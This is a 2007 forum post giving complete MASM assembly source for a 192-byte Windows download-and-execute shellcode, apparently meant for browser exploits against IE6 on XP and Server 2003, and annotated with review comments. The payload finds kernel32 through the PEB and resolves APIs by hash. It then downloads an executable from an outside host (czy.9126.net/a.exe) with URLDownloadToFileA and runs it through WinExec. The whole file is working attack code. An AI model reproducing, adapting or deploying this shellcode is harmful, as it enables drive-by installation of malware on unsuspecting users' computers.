

win32 Tiny Download and Exec Shellcode 192 bytes
Posted by 黑暗天使 ("Dark Angel"; the page renders this GBK name as "ºÚ°µÌìʹ") 2007-11-23 23:39:00

;Tiny Download&&Exec ShellCode codz czy NetSpy
;size accounting in bytes (author's figures): 163 = 61 (16+8+9+(28)) + 95 (68+27) + 17
;163 + 19 = 192 bytes total
comment %
               #-----------------------------------------------------------#
               #  Tiny Download&&Exec ShellCode-->        #
               #    -->size 192                                        #
               #                      2007 NetSpy                  #
               #                    codz: czy                          #
               #                  czy.9126.net                      #
               #-----------------------------------------------------------#

Tested by the author on: IE6 + Windows XP SP2 / Windows Server 2003 SP2 / Windows 2000 SP4
%
.586
.model flat,stdcall
option casemap:none

include     c:\masm32\include\windows.inc
include     c:\masm32\include\kernel32.inc
includelib  c:\masm32\lib\kernel32.lib
include     c:\masm32\include\user32.inc
includelib  c:\masm32\lib\user32.lib


.data
shelldatabuffer db 1024 dup(0)     ; not referenced anywhere in the visible code (spare scratch buffer)
shellcodebuffer db 2046 dup(0)     ; destination of the 256-byte RtlMoveMemory copy made in start:
                                   ; NOTE(review): the payload is executed from this .data buffer
                                   ; (jmp eax in start:), so the page must be executable at run time;
                                   ; expect a fault if DEP/NX is enforced for this process
downshell db 'down exploit',0      ; caption and text of the MessageBoxA shown before the payload runs
.code
;-----------------------------------------------------------------------
; Test harness + payload.
;
; start: shows a message box, copies 256 bytes from the fixed address
; 00401040H into shellcodebuffer (.data) and jumps there.  The bytes
; copied are the @@shellcodebegin .. somenops2 stretch further down.
;
; NOTE(review): 00401040H is a hard-coded image address, not a label.
; It appears to be chosen so that, with .text at 00401000H, the 64 bytes
; of harness code (two invokes, mov, jmp and the 18 NOPs in somenops)
; put @@shellcodebegin exactly at 00401040H.  Relinking with another
; image base, or editing anything above @@shellcodebegin, silently
; copies the wrong bytes.  A label (offset @@shellcodebegin) would be
; the robust form.
;-----------------------------------------------------------------------
start:
 invoke MessageBoxA,0,offset downshell,offset downshell,1   ; "down exploit" prompt; button result is ignored
 invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256  ; copy payload (192 bytes per header) plus slack into .data
 mov eax,offset shellcodebuffer
 jmp eax                                                    ; execute from .data: requires an executable page (no DEP)
 somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
; (the author's note that stood here is unrecoverable from the page's
;  encoding; it mentions "shellcode" twice and seems to describe the
;  copy-then-jump above)
;-----------------------------------------------------------------------
; Payload: position-independent download-and-execute.
;
; Layout.  Everything is addressed relative to EDI, which walks down the
; table as each hash dword is overwritten by the resolved address:
;   @@beginaddr:    push 03h / jmp short      4 bytes of code, skipped by the first scasd
;   myExitProcess   dd hash -> address of ExitProcess
;   myWinExec       dd hash -> address of WinExec
;   myLoadLibraryA  dd hash -> address of LoadLibraryA
;   dll             'URLMON',0,0             8 bytes, skipped by two scasd
;   myUrlDownFile   dd hash -> address of URLDownloadToFileA (resolved from urlmon)
;   path            'c:\a.exe',0             9 bytes; url = path + 9
;   url             'http://czy.9126.net/a.exe',0
; The hash dwords are the ror13/add hash of the export name that the
; @@again loop computes.
;
; Register roles in the resolver:
;   EBP = base of the module being searched (kernel32 first, then urlmon)
;   EDI = next hash slot in the table above
;   ECX = hashes left in the current batch (3, then 1)
;   EAX = address of the last export resolved (used as the call target)
;   EDX = 0 when @@again exits on the NUL terminator; reused below as a
;         1-byte "push 0"
;-----------------------------------------------------------------------
@@shellcodebegin:
 call @@beginaddr            ; pushes the address of @@beginaddr (self-locating; no absolute addresses)
@@beginaddr:
 PUSH 03H      ; count of API hashes in the first batch (ExitProcess, WinExec, LoadLibraryA)
 jmp @@realshellcode
myExitProcess     dd 073e2d87eh      ; hash of "ExitProcess"   -> replaced by its address
myWinExec         dd 00e8afe98h      ; hash of "WinExec"       -> replaced by its address
myLoadLibraryA    dd 0ec0e4e8eh      ; hash of "LoadLibraryA"  -> replaced by its address
dll               db 'URLMON',0,0    ; LoadLibraryA argument; padded to 8 bytes so two scasd skip it
myUrlDownFile     dd 0702f1a36h      ; hash of "URLDownloadToFileA" -> replaced (second batch, urlmon base)
path              db 'c:\a.exe',0    ; download target and WinExec command line (9 bytes incl. NUL)
url               db 'http://czy.9126.net/a.exe',0



@@realshellcode:
    POP ECX                  ; ECX = 3 (pushed at @@beginaddr)
    POP EDI                  ; EDI = @@beginaddr (pushed by the call)
    SCASD ;edi+4             ; skip the 4 bytes of push/jmp so EDI points at myExitProcess
; Locate the kernel32.dll base through the PEB loader list (author's comment, translated)
db  67h,64h,0A1h,30h,00h     ; hand-encoded  mov eax, fs:[30h]  (PEB); the 67h prefix gives a 5-byte form
 mov eax, [eax+0cH]          ; PEB->Ldr
 mov esi, [eax+1cH]          ; Ldr->InInitializationOrderModuleList.Flink (first entry)
    lodsd                    ; EAX = Flink of that entry = second entry in the list
 mov ebp, [eax+08H]          ; EBP = DllBase of the second entry -- kernel32.dll on the systems listed in the header
                             ; NOTE(review): this ordering is an assumption of those Windows versions; verify on anything newer
; Resolver: for each of the ECX hash slots at EDI, walk the export table of the module at EBP
@@next2:
PUSH      ECX                ; save the batch counter across the export walk
@@next3:
MOV       ESI,[EBP+3Ch]          ; e_lfanew
MOV       ESI,[EBP+ESI+78h]      ; DataDirectory[EXPORT].VirtualAddress
ADD       ESI,EBP                ; ESI = IMAGE_EXPORT_DIRECTORY
PUSH      ESI                    ; kept for the ordinal / function-address lookups below
MOV       ESI,[ESI+20h]          ; AddressOfNames (RVA)
ADD       ESI,EBP
XOR       ECX,ECX
DEC       ECX                    ; ECX = -1: name index, pre-incremented in @@next
@@next:
INC       ECX
LODSD                            ; EAX = RVA of the next export name
ADD       EAX,EBP                ; EAX = name string
XOR       EBX,EBX                ; EBX = running hash
@@again:
    MOVSX     EDX,BYTE PTR [EAX]
    CMP       DL,DH              ; DH==DL only for 00h (and FFh) after sign extension: stops at the NUL terminator
    JZ        @@end
    ROR       EBX,0Dh            ; hash = ror(hash, 13) + byte
    ADD       EBX,EDX
    INC       EAX
    JMP       @@again
@@end:
CMP       EBX,[EDI]              ; does this name hash match the current table slot?
JNZ       @@next                 ; NOTE(review): no bound check on the name index; an unmatched hash walks past AddressOfNames until it faults

POP       ESI                    ; IMAGE_EXPORT_DIRECTORY
MOV       EBX,[ESI+24h]          ; AddressOfNameOrdinals
ADD       EBX,EBP
MOV       CX,WORD PTR [ECX*2+EBX]   ; ordinal of the matched name (16-bit write; high half of ECX is the index's high bits, 0 for realistic export counts)
MOV       EBX,[ESI+1Ch]          ; AddressOfFunctions
ADD       EBX,EBP
MOV       EAX,[ECX*4+EBX]        ; function RVA
ADD       EAX,EBP                ; EAX = resolved address
STOSD                            ; overwrite the hash slot with it; EDI -> next slot (self-modifying: needs writable memory)
POP       ECX
loop @@next2                     ; next hash in this batch

; Dispatch on the byte now under EDI: after batch 1 EDI is at dll ('U'), after batch 2 at path ('c')
mov ecx,[edi]   ;2
cmp cl,'c'      ;3
jz @@downfile   ;2
PUSH EDI        ; lpLibFileName = "URLMON"
CALL EAX        ;2  EAX = last address resolved = LoadLibraryA
                ; NOTE(review): a NULL return is not checked; EBP would become 0 and [EBP+3Ch] faults
xchg eax,ebp    ; EBP = urlmon.dll base for the next resolver pass
scasd           ; skip 'URLMON',0,0 (2 x 4 bytes)
scasd
push 01         ;2  one hash (URLDownloadToFileA) to resolve from the second DLL (author's comment, translated)
jmp @@next3     ;2  re-enter the resolver; the push above stands in for @@next2's PUSH ECX
                ;17 bytes for this stretch (author's count)


@@downfile:
; URLDownloadToFileA(pCaller=0, szURL=url, szFileName=path, dwReserved=0, lpfnCB=0)
; EDX is still 0 from the resolver's terminating MOVSX, so each "push edx" is a 1-byte push 0.
 push edx  ;0                    ; lpfnCB
 push edx  ;0                    ; dwReserved
 push    edi  ;file=c:\a.exe     ; szFileName = path
 lea     ecx, dword ptr [edi+9h] ; szURL = path + 9 ('c:\a.exe',0 is 9 bytes)
 push    ecx  ;url
 push edx  ;0                    ; pCaller
 call eax  ;URLDownloadToFileA,0,url,file=c:\a.exe,0,0
; NOTE(review): the HRESULT in EAX is never tested; on a failed download
; WinExec still runs whatever c:\a.exe already holds, or fails silently.

 push 1 ;FOR TEST                ; uCmdShow = 1 (window shown); the author flags this as a test setting
 push edi                        ; lpCmdLine = path
 call dword ptr [edi-14H] ;winexec,'c:\xxx.exe',1   ; slot myWinExec (path is 24 bytes past myExitProcess; 24-14h = 4)

    call dword ptr [edi-18H] ;Exitprocess            ; slot myExitProcess; no uExitCode is pushed, so the exit code is whatever lies on the stack

    somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h   ; trailing NOP padding copied along with the payload
    invoke ExitProcess,0          ; harness exit; not reached once the payload runs (it terminates the process itself)
end start

; NetSpy
